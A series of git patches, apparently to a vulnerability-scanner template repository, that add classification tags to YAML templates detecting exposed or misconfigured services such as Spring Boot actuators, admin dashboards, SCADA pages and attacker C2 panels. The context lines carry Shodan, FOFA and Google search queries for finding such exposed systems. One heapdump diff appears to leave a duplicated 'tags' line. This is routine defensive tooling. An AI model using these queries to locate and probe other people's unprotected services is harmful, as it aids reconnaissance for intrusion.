html:"python_gc_objects_collected_total" - tags: devops,python,misconfig + tags: exposure,devops,python,misconfig http: - method: GET diff --git a/http/misconfiguration/questdb-console.yaml b/http/misconfiguration/questdb-console.yaml index 05d2dc0e36..606cc07843 100644 --- a/http/misconfiguration/questdb-console.yaml +++ b/http/misconfiguration/questdb-console.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"QuestDB · Console" - tags: misconfig,questdb + tags: misconfig,questdb,exposure http: - method: GET diff --git a/http/misconfiguration/rabbitmq-exporter-metrics.yaml b/http/misconfiguration/rabbitmq-exporter-metrics.yaml index 7d2540baab..0dcf11311e 100644 --- a/http/misconfiguration/rabbitmq-exporter-metrics.yaml +++ b/http/misconfiguration/rabbitmq-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"RabbitMQ Exporter" - tags: rabbitmq,debug,misconfig + tags: rabbitmq,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/ray-dashboard.yaml b/http/misconfiguration/ray-dashboard.yaml index 2cb2f931f1..46563d9b18 100644 --- a/http/misconfiguration/ray-dashboard.yaml +++ b/http/misconfiguration/ray-dashboard.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Ray Dashboard" - tags: misconfig,ray + tags: misconfig,exposure,ray http: - method: GET diff --git a/http/misconfiguration/rekognition-image-validation.yaml b/http/misconfiguration/rekognition-image-validation.yaml index ae9c558d8c..5451d00b37 100644 --- a/http/misconfiguration/rekognition-image-validation.yaml +++ b/http/misconfiguration/rekognition-image-validation.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Rekognition Image Validation Debug UI" - tags: misconfig + tags: misconfig,exposure http: - method: GET diff --git a/http/misconfiguration/salesforce-aura.yaml b/http/misconfiguration/salesforce-aura.yaml index b9ba873fda..54ccbaa7a1 100644 --- a/http/misconfiguration/salesforce-aura.yaml +++ b/http/misconfiguration/salesforce-aura.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: aura,unauth,salesforce,misconfig + tags: aura,unauth,salesforce,exposure,misconfig metadata: max-request: 5 diff --git a/http/misconfiguration/service-pwd.yaml b/http/misconfiguration/service-pwd.yaml index 4691e87af9..17757f869a 100644 --- a/http/misconfiguration/service-pwd.yaml +++ b/http/misconfiguration/service-pwd.yaml @@ -7,7 +7,7 @@ info: description: service.pwd was discovered, which is likely to contain sensitive information. reference: - https://www.exploit-db.com/ghdb/7256 - tags: listing,service,edb,misconfig + tags: exposure,listing,service,edb,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/setup-github-enterprise.yaml b/http/misconfiguration/setup-github-enterprise.yaml index fe16ef1415..1b0d1811b0 100644 --- a/http/misconfiguration/setup-github-enterprise.yaml +++ b/http/misconfiguration/setup-github-enterprise.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-1373456171 - tags: panel,setup,github,misconfig + tags: panel,exposure,setup,github,misconfig http: - method: GET diff --git a/http/misconfiguration/skycaiji-install.yaml b/http/misconfiguration/skycaiji-install.yaml index a904e32191..615c3e8de8 100644 --- a/http/misconfiguration/skycaiji-install.yaml +++ b/http/misconfiguration/skycaiji-install.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: SkyCaiji was discovered. - tags: tech,skycaiji,misconfig + tags: tech,skycaiji,exposure,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/smarterstats-setup.yaml b/http/misconfiguration/smarterstats-setup.yaml index eba92b618e..ad807a9c61 100644 --- a/http/misconfiguration/smarterstats-setup.yaml +++ b/http/misconfiguration/smarterstats-setup.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Welcome to SmarterStats!" - tags: misconfig,smarterstats + tags: misconfig,smarterstats,exposure http: - method: GET diff --git a/http/misconfiguration/sony-bravia-disclosure.yaml b/http/misconfiguration/sony-bravia-disclosure.yaml index 41839a10b3..1c4b90e8f2 100644 --- a/http/misconfiguration/sony-bravia-disclosure.yaml +++ b/http/misconfiguration/sony-bravia-disclosure.yaml @@ -9,7 +9,7 @@ info: reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php - https://www.zeroscience.mk/codes/sonybravia_sysinfo.txt - tags: misconfig,sony,unauth + tags: misconfig,sony,unauth,exposure metadata: max-request: 1 diff --git a/http/misconfiguration/spidercontrol-scada-server-info.yaml b/http/misconfiguration/spidercontrol-scada-server-info.yaml index 4ee0cf43a0..12425346e1 100644 --- a/http/misconfiguration/spidercontrol-scada-server-info.yaml +++ b/http/misconfiguration/spidercontrol-scada-server-info.yaml @@ -7,7 +7,7 @@ info: description: SpiderControl SCADA Web Server is vulnerable to sensitive information exposure. Numerous, market-leading OEM manufacturers - from a wide variety of industries - rely on SpiderControl. reference: - https://spidercontrol.net/spidercontrol-inside/ - tags: spidercontrol,scada,misconfig + tags: spidercontrol,scada,exposure,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/springboot/spring-eureka.yaml b/http/misconfiguration/springboot/spring-eureka.yaml index d09e0ee49a..5e4a3306c2 100644 --- a/http/misconfiguration/springboot/spring-eureka.yaml +++ b/http/misconfiguration/springboot/spring-eureka.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot,eureka + tags: misconfig,springboot,exposure,eureka http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-auditevents.yaml b/http/misconfiguration/springboot/springboot-auditevents.yaml index cc63edc850..28e185e220 100644 --- a/http/misconfiguration/springboot/springboot-auditevents.yaml +++ b/http/misconfiguration/springboot/springboot-auditevents.yaml @@ -15,7 +15,7 @@ info: max-request: 2 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot + tags: misconfig,springboot,exposure http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-autoconfig.yaml b/http/misconfiguration/springboot/springboot-autoconfig.yaml index 374cb85670..234ebfacb7 100644 --- a/http/misconfiguration/springboot/springboot-autoconfig.yaml +++ b/http/misconfiguration/springboot/springboot-autoconfig.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Displays an auto-configuration report showing all auto-configuration candidates and the reason why they 'were' or 'were not' applied. - tags: springboot,misconfig + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-beans.yaml b/http/misconfiguration/springboot/springboot-beans.yaml index bf1e5a9e1f..bdca65d657 100644 --- a/http/misconfiguration/springboot/springboot-beans.yaml +++ b/http/misconfiguration/springboot/springboot-beans.yaml @@ -5,7 +5,7 @@ info: author: ajaysenr severity: low description: Displays a complete list of all the Spring beans in the application - tags: springboot,misconfig + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-caches.yaml b/http/misconfiguration/springboot/springboot-caches.yaml index d49ff3ea37..2c11de9e0b 100644 --- a/http/misconfiguration/springboot/springboot-caches.yaml +++ b/http/misconfiguration/springboot/springboot-caches.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 2 verified: true - tags: misconfig,springboot + tags: misconfig,springboot,exposure http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-conditions.yaml b/http/misconfiguration/springboot/springboot-conditions.yaml index ee6be25799..0c9b63c4ff 100644 --- a/http/misconfiguration/springboot/springboot-conditions.yaml +++ b/http/misconfiguration/springboot/springboot-conditions.yaml @@ -10,7 +10,7 @@ info: max-request: 2 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot + tags: misconfig,springboot,exposure http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-configprops.yaml b/http/misconfiguration/springboot/springboot-configprops.yaml index f0c393bc03..65df3dff42 100644 --- a/http/misconfiguration/springboot/springboot-configprops.yaml +++ b/http/misconfiguration/springboot/springboot-configprops.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: Sensitive environment variables may not be masked - tags: springboot,misconfig + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-dump.yaml b/http/misconfiguration/springboot/springboot-dump.yaml index ddefb3807c..5719fb3b15 100644 --- a/http/misconfiguration/springboot/springboot-dump.yaml +++ b/http/misconfiguration/springboot/springboot-dump.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Performs a thread dump - tags: springboot,misconfig + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-env.yaml b/http/misconfiguration/springboot/springboot-env.yaml index ae588f79f5..2f22ea0929 100644 --- a/http/misconfiguration/springboot/springboot-env.yaml +++ b/http/misconfiguration/springboot/springboot-env.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb,philippedelteil,stupidfish severity: low description: Sensitive environment variables may not be masked - tags: misconfig,springboot,env + tags: misconfig,springboot,env,exposure metadata: max-request: 4 diff --git a/http/misconfiguration/springboot/springboot-features.yaml b/http/misconfiguration/springboot/springboot-features.yaml index 62c5f69f08..b937281862 100644 --- a/http/misconfiguration/springboot/springboot-features.yaml +++ b/http/misconfiguration/springboot/springboot-features.yaml @@ -8,7 +8,7 @@ info: max-request: 2 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot + tags: misconfig,springboot,exposure http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-flyway.yaml b/http/misconfiguration/springboot/springboot-flyway.yaml index 90ee2074cc..9bd6ab4c88 100644 --- a/http/misconfiguration/springboot/springboot-flyway.yaml +++ b/http/misconfiguration/springboot/springboot-flyway.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 2 verified: true - tags: misconfig,springboot,flyway + tags: misconfig,springboot,exposure,flyway http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-gateway.yaml b/http/misconfiguration/springboot/springboot-gateway.yaml index 6383205788..ce528c8ca3 100644 --- a/http/misconfiguration/springboot/springboot-gateway.yaml +++ b/http/misconfiguration/springboot/springboot-gateway.yaml @@ -7,7 +7,7 @@ info: description: Sensitive environment variables may not be masked reference: - https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/ - tags: springboot,misconfig + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-health.yaml b/http/misconfiguration/springboot/springboot-health.yaml index e6fee86e20..b455d4cc05 100644 --- a/http/misconfiguration/springboot/springboot-health.yaml +++ b/http/misconfiguration/springboot/springboot-health.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: springboot,misconfig + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-heapdump.yaml b/http/misconfiguration/springboot/springboot-heapdump.yaml index e17e449dc0..5828c791ff 100644 --- a/http/misconfiguration/springboot/springboot-heapdump.yaml +++ b/http/misconfiguration/springboot/springboot-heapdump.yaml @@ -8,6 +8,7 @@ info: A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests. reference: - https://github.com/pyn3rd/Spring-Boot-Vulnerability + tags: springboot,exposure,misconfig metadata: max-request: 3 tags: springboot,exposure,misconfig diff --git a/http/misconfiguration/springboot/springboot-httptrace.yaml b/http/misconfiguration/springboot/springboot-httptrace.yaml index 727c4ba803..795b25dcca 100644 --- a/http/misconfiguration/springboot/springboot-httptrace.yaml +++ b/http/misconfiguration/springboot/springboot-httptrace.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: View recent HTTP requests and responses - tags: springboot,misconfig + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-jolokia.yaml b/http/misconfiguration/springboot/springboot-jolokia.yaml index 166e3e01a4..6fb5be4816 100644 --- a/http/misconfiguration/springboot/springboot-jolokia.yaml +++ b/http/misconfiguration/springboot/springboot-jolokia.yaml @@ -10,7 +10,7 @@ info: max-request: 2 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot + tags: misconfig,springboot,exposure http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-liquidbase.yaml b/http/misconfiguration/springboot/springboot-liquidbase.yaml index 9ad2413258..3f335e23e4 100644 --- a/http/misconfiguration/springboot/springboot-liquidbase.yaml +++ b/http/misconfiguration/springboot/springboot-liquidbase.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 2 verified: true - tags: misconfig,springboot,liquibase + tags: misconfig,springboot,exposure,liquibase http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-logfile.yaml b/http/misconfiguration/springboot/springboot-logfile.yaml index a0aa041e4d..d7076448f0 100644 --- a/http/misconfiguration/springboot/springboot-logfile.yaml +++ b/http/misconfiguration/springboot/springboot-logfile.yaml @@ -10,7 +10,7 @@ info: max-request: 3 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot + tags: misconfig,springboot,exposure http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-loggerconfig.yaml b/http/misconfiguration/springboot/springboot-loggerconfig.yaml index be82a40bba..01a0229a8a 100644 --- a/http/misconfiguration/springboot/springboot-loggerconfig.yaml +++ b/http/misconfiguration/springboot/springboot-loggerconfig.yaml @@ -15,7 +15,7 @@ info: max-request: 2 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot + tags: misconfig,springboot,exposure http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-loggers.yaml b/http/misconfiguration/springboot/springboot-loggers.yaml index ff4faafad1..85408ca4ac 100644 --- a/http/misconfiguration/springboot/springboot-loggers.yaml +++ b/http/misconfiguration/springboot/springboot-loggers.yaml @@ -4,7 +4,7 @@ info: name: Detect Springboot Loggers author: that_juan_,dwisiswant0,wdahlenb severity: low - tags: springboot,misconfig + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-mappings.yaml b/http/misconfiguration/springboot/springboot-mappings.yaml index 15c3c94473..17f602c958 100644 --- a/http/misconfiguration/springboot/springboot-mappings.yaml +++ b/http/misconfiguration/springboot/springboot-mappings.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: Additional routes may be displayed - tags: springboot,misconfig + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-metrics.yaml b/http/misconfiguration/springboot/springboot-metrics.yaml index 648ce688d5..4920f564f2 100644 --- a/http/misconfiguration/springboot/springboot-metrics.yaml +++ b/http/misconfiguration/springboot/springboot-metrics.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Additional routes may be displayed - tags: springboot,misconfig + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-scheduledtasks.yaml b/http/misconfiguration/springboot/springboot-scheduledtasks.yaml index 449bb6f48a..9a0cbb9e02 100644 --- a/http/misconfiguration/springboot/springboot-scheduledtasks.yaml +++ b/http/misconfiguration/springboot/springboot-scheduledtasks.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 2 verified: true - tags: misconfig,springboot + tags: misconfig,springboot,exposure http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-status.yaml b/http/misconfiguration/springboot/springboot-status.yaml index 674ee512dd..a925f7dd68 100644 --- a/http/misconfiguration/springboot/springboot-status.yaml +++ b/http/misconfiguration/springboot/springboot-status.yaml @@ -13,7 +13,7 @@ info: max-request: 2 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot + tags: misconfig,springboot,exposure http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-trace.yaml b/http/misconfiguration/springboot/springboot-trace.yaml index 2de0064bde..f7751037cf 100644 --- a/http/misconfiguration/springboot/springboot-trace.yaml +++ b/http/misconfiguration/springboot/springboot-trace.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: View recent HTTP requests and responses - tags: misconfig,springboot + tags: misconfig,springboot,exposure metadata: max-request: 1 diff --git a/http/misconfiguration/sql-server-report-viewer.yaml b/http/misconfiguration/sql-server-report-viewer.yaml index 58c40b3686..88fa143a35 100644 --- a/http/misconfiguration/sql-server-report-viewer.yaml +++ b/http/misconfiguration/sql-server-report-viewer.yaml @@ -10,7 +10,7 @@ info: max-request: 2 verified: true google-query: inurl:"/Reports/Pages/Folder.aspx" - tags: misconfig,sql,report + tags: misconfig,sql,report,exposure http: - raw: diff --git a/http/misconfiguration/syncthing-dashboard.yaml b/http/misconfiguration/syncthing-dashboard.yaml index 54ae488412..74241d85e0 100644 --- a/http/misconfiguration/syncthing-dashboard.yaml +++ b/http/misconfiguration/syncthing-dashboard.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: http.html:'ng-app="syncthing"' - tags: misconfig,syncthing + tags: misconfig,syncthing,exposure http: - method: GET diff --git a/http/misconfiguration/system-properties-exposure.yaml b/http/misconfiguration/system-properties-exposure.yaml index 69bf227c32..10f4948bfc 100644 --- a/http/misconfiguration/system-properties-exposure.yaml +++ b/http/misconfiguration/system-properties-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"System Properties" - tags: misconfig,system + tags: misconfig,system,exposure http: - method: GET diff --git a/http/misconfiguration/tasmota-config-webui.yaml b/http/misconfiguration/tasmota-config-webui.yaml index 1e1f1bb4d5..e60c234a24 100644 --- a/http/misconfiguration/tasmota-config-webui.yaml +++ b/http/misconfiguration/tasmota-config-webui.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Tasmota" - tags: misconfig,tasmota,config + tags: misconfig,tasmota,exposure,config http: - method: GET diff --git a/http/misconfiguration/thinkphp-errors.yaml b/http/misconfiguration/thinkphp-errors.yaml index 8fe1b460ae..a45e16ea17 100644 --- a/http/misconfiguration/thinkphp-errors.yaml +++ b/http/misconfiguration/thinkphp-errors.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true fofa-query: app="ThinkPHP" && title="System Error" - tags: thinkphp,misconfig + tags: thinkphp,misconfig,exposure http: - method: GET diff --git a/http/misconfiguration/tomcat-cookie-exposed.yaml b/http/misconfiguration/tomcat-cookie-exposed.yaml index 57f7c49246..56e1118f57 100644 --- a/http/misconfiguration/tomcat-cookie-exposed.yaml +++ b/http/misconfiguration/tomcat-cookie-exposed.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 verified: true - tags: misconfig,apache,tomcat + tags: misconfig,apache,tomcat,exposure http: - method: GET diff --git a/http/misconfiguration/transmission-dashboard.yaml b/http/misconfiguration/transmission-dashboard.yaml index 5de016568b..4f5af1a680 100644 --- a/http/misconfiguration/transmission-dashboard.yaml +++ b/http/misconfiguration/transmission-dashboard.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Transmission Web Interface" - tags: misconfig,transmission,dashboard + tags: misconfig,transmission,exposure,dashboard http: - method: GET diff --git a/http/misconfiguration/typo3-composer.yaml b/http/misconfiguration/typo3-composer.yaml index cf438e751e..7f64d8c230 100644 --- a/http/misconfiguration/typo3-composer.yaml +++ b/http/misconfiguration/typo3-composer.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: "X-TYPO3-Parsetime: 0ms" - tags: typo3,cms,misconfig + tags: typo3,cms,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/unauth-apache-kafka-ui.yaml b/http/misconfiguration/unauth-apache-kafka-ui.yaml index 489ad5c6d6..6e129dca05 100644 --- a/http/misconfiguration/unauth-apache-kafka-ui.yaml +++ b/http/misconfiguration/unauth-apache-kafka-ui.yaml @@ -12,7 +12,7 @@ info: max-request: 2 verified: true shodan-query: http.title:"UI for Apache Kafka" - tags: misconfig,apache,kafka,unauth + tags: misconfig,apache,kafka,unauth,exposure http: - method: GET diff --git a/http/misconfiguration/unauth-axyom-network-manager.yaml b/http/misconfiguration/unauth-axyom-network-manager.yaml index b128f4976a..38e5de4aea 100644 --- a/http/misconfiguration/unauth-axyom-network-manager.yaml +++ b/http/misconfiguration/unauth-axyom-network-manager.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Axyom Network Manager" - tags: misconfig,axyom,unauth + tags: misconfig,axyom,exposure,unauth http: - method: GET diff --git a/http/misconfiguration/unauth-kubecost.yaml b/http/misconfiguration/unauth-kubecost.yaml index a4d88c1106..79b2cbb8b3 100644 --- a/http/misconfiguration/unauth-kubecost.yaml +++ b/http/misconfiguration/unauth-kubecost.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:kubecost - tags: misconfig,unauth,kubecost + tags: misconfig,exposure,unauth,kubecost http: - method: GET diff --git a/http/misconfiguration/unauth-wavink-panel.yaml b/http/misconfiguration/unauth-wavink-panel.yaml index 806b86f718..5dd5bacf87 100644 --- a/http/misconfiguration/unauth-wavink-panel.yaml +++ b/http/misconfiguration/unauth-wavink-panel.yaml @@ -9,7 +9,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Wi-Fi APP Login" - tags: wavlink,unauth,misconfig,router + tags: exposure,wavlink,unauth,misconfig,router http: - method: GET diff --git a/http/misconfiguration/unauthenticated-glances.yaml b/http/misconfiguration/unauthenticated-glances.yaml index 7c1f206bb7..0cf9cc859e 100644 --- a/http/misconfiguration/unauthenticated-glances.yaml +++ b/http/misconfiguration/unauthenticated-glances.yaml @@ -7,7 +7,7 @@ info: description: Glance running web server mode & Unauthenticated leads system monitoring to info disclosure reference: - https://glances.readthedocs.io/en/latest/quickstart.html#how-to-protect-your-server-or-web-server-with-a-login-password - tags: glances,misconfig + tags: exposure,glances,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/viewpoint-system-status.yaml b/http/misconfiguration/viewpoint-system-status.yaml index 0248c3ecc0..6227b9ac40 100644 --- a/http/misconfiguration/viewpoint-system-status.yaml +++ b/http/misconfiguration/viewpoint-system-status.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"ViewPoint System Status" - tags: status,viewpoint,misconfig + tags: status,exposure,viewpoint,misconfig http: - method: GET diff --git a/http/misconfiguration/wamp-server-configuration.yaml b/http/misconfiguration/wamp-server-configuration.yaml index d4ef85188d..151267a9ab 100644 --- a/http/misconfiguration/wamp-server-configuration.yaml +++ b/http/misconfiguration/wamp-server-configuration.yaml @@ -6,7 +6,7 @@ info: severity: medium description: Wamp default page will expose sensitive configuration and vhosts. reference: https://www.exploit-db.com/ghdb/6891. - tags: wamp,misconfig + tags: wamp,exposure,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/webdav-enabled.yaml b/http/misconfiguration/webdav-enabled.yaml index e8d0996cff..1b1d85d755 100644 --- a/http/misconfiguration/webdav-enabled.yaml +++ b/http/misconfiguration/webdav-enabled.yaml @@ -18,7 +18,7 @@ info: max-request: 3 verified: true shodan-query: "Ms-Author-Via: DAV" - tags: webdav,misconfig + tags: webdav,misconfig,exposure http: - raw: From 51064d14208814ff5f71b1816401405fe0d3e0ba Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 15:49:09 -0700 Subject: [PATCH 219/609] add panel tag to http/exposed-panels/ templates --- http/exposed-panels/aws-ec2-autoscale.yaml | 2 +- http/exposed-panels/c2/brute-ratel-c4.yaml | 2 +- http/exposed-panels/c2/empire-c2.yaml | 2 +- http/exposed-panels/c2/evilginx.yaml | 2 +- http/exposed-panels/c2/nh-c2.yaml | 2 +- http/exposed-panels/c2/viper-c2.yaml | 2 +- http/exposed-panels/crontab-ui.yaml | 2 +- http/exposed-panels/eos-http-browser.yaml | 2 +- http/exposed-panels/pdi-device-page.yaml | 2 +- http/exposed-panels/tup-openframe.yaml | 2 +- 10 files changed, 10 insertions(+), 10 deletions(-) diff --git a/http/exposed-panels/aws-ec2-autoscale.yaml b/http/exposed-panels/aws-ec2-autoscale.yaml index d1b61492b9..bfe0d7b918 100644 --- a/http/exposed-panels/aws-ec2-autoscale.yaml +++ b/http/exposed-panels/aws-ec2-autoscale.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: html:"AWS EC2 Auto Scaling Lab" - tags: exposure,ec2,aws,amazon + tags: exposure,ec2,aws,amazon,panel http: - method: GET diff --git a/http/exposed-panels/c2/brute-ratel-c4.yaml b/http/exposed-panels/c2/brute-ratel-c4.yaml index 806a0b6eea..abd400f2d8 100644 --- a/http/exposed-panels/c2/brute-ratel-c4.yaml +++ b/http/exposed-panels/c2/brute-ratel-c4.yaml @@ -12,7 +12,7 @@ info: max-request: 1 shodan-query: http.html_hash:-1957161625 verified: "true" - tags: c2,bruteratel,c4 + tags: c2,bruteratel,c4,panel http: - method: GET diff --git a/http/exposed-panels/c2/empire-c2.yaml b/http/exposed-panels/c2/empire-c2.yaml index a09c0b8819..1df221c3bf 100644 --- a/http/exposed-panels/c2/empire-c2.yaml +++ b/http/exposed-panels/c2/empire-c2.yaml @@ -13,7 +13,7 @@ info: censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc max-request: 1 verified: "true" - tags: c2,ir,osint,empire + tags: c2,ir,osint,empire,panel http: - method: GET diff --git a/http/exposed-panels/c2/evilginx.yaml b/http/exposed-panels/c2/evilginx.yaml index fd4dfcdb08..abe70080a3 100644 --- a/http/exposed-panels/c2/evilginx.yaml +++ b/http/exposed-panels/c2/evilginx.yaml @@ -12,7 +12,7 @@ info: censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d max-request: 1 verified: "true" - tags: tech,evilginx,c2,phishing + tags: tech,evilginx,c2,phishing,panel http: - method: GET diff --git a/http/exposed-panels/c2/nh-c2.yaml b/http/exposed-panels/c2/nh-c2.yaml index 7bdc7feb49..d1d835ec5e 100644 --- a/http/exposed-panels/c2/nh-c2.yaml +++ b/http/exposed-panels/c2/nh-c2.yaml @@ -10,7 +10,7 @@ info: censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572 max-request: 1 verified: "true" - tags: tech,nh,c2 + tags: tech,nh,c2,panel http: - method: GET diff --git a/http/exposed-panels/c2/viper-c2.yaml b/http/exposed-panels/c2/viper-c2.yaml index d2132dc2dc..e83c230a8b 100644 --- a/http/exposed-panels/c2/viper-c2.yaml +++ b/http/exposed-panels/c2/viper-c2.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: http.html_hash:1015055567 verified: "true" - tags: tech,viper,c2,malware,ir + tags: tech,viper,c2,malware,ir,panel http: - method: GET diff --git a/http/exposed-panels/crontab-ui.yaml b/http/exposed-panels/crontab-ui.yaml index 00f1282921..2c015deb13 100644 --- a/http/exposed-panels/crontab-ui.yaml +++ b/http/exposed-panels/crontab-ui.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: html:"Crontab UI" - tags: exposure,crontab,ui + tags: exposure,crontab,ui,panel http: - method: GET diff --git a/http/exposed-panels/eos-http-browser.yaml b/http/exposed-panels/eos-http-browser.yaml index 9551f22680..ab4aa93475 100644 --- a/http/exposed-panels/eos-http-browser.yaml +++ b/http/exposed-panels/eos-http-browser.yaml @@ -10,7 +10,7 @@ info: max-request: 2 verified: true shodan-query: title:"EOS HTTP Browser" - tags: exposure,eos,httpbrowser + tags: exposure,eos,httpbrowser,panel http: - method: GET diff --git a/http/exposed-panels/pdi-device-page.yaml b/http/exposed-panels/pdi-device-page.yaml index a6b8b77dfa..8da85b02a7 100644 --- a/http/exposed-panels/pdi-device-page.yaml +++ b/http/exposed-panels/pdi-device-page.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: html:"PDI Intellifuel" - tags: exposure,pdi,intellifuel + tags: exposure,pdi,intellifuel,panel http: - method: GET diff --git a/http/exposed-panels/tup-openframe.yaml b/http/exposed-panels/tup-openframe.yaml index 3e091bc7db..fa6bd377d2 100644 --- a/http/exposed-panels/tup-openframe.yaml +++ b/http/exposed-panels/tup-openframe.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:824580113 - tags: exposure,login,tup,openframe + tags: exposure,login,tup,openframe,panel http: - method: GET From 7f3eab1b68816f8fdb06da3245cff20636ede2e6 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 15:50:06 -0700 Subject: [PATCH 220/609] add iot tag to http/iot/ templates --- http/iot/routeros-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/iot/routeros-login.yaml b/http/iot/routeros-login.yaml index d2b8a70167..4c46abae33 100644 --- a/http/iot/routeros-login.yaml +++ b/http/iot/routeros-login.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"RouterOS router configuration page" - tags: panel,router,routeros + tags: panel,router,routeros,iot http: - method: GET From b4b8075d0102512c44d37eb0c6903db14d5c371c Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 15:51:06 -0700 Subject: [PATCH 221/609] add misc tag to http/miscellaneous/ templates --- http/miscellaneous/aws-ecs-container-agent-tasks.yaml | 2 +- http/miscellaneous/exposed-file-upload-form.yaml | 2 +- http/miscellaneous/microsoft-azure-error.yaml | 2 +- http/miscellaneous/netflix-conductor-version.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/http/miscellaneous/aws-ecs-container-agent-tasks.yaml b/http/miscellaneous/aws-ecs-container-agent-tasks.yaml index 9c4e174b67..11b42d9802 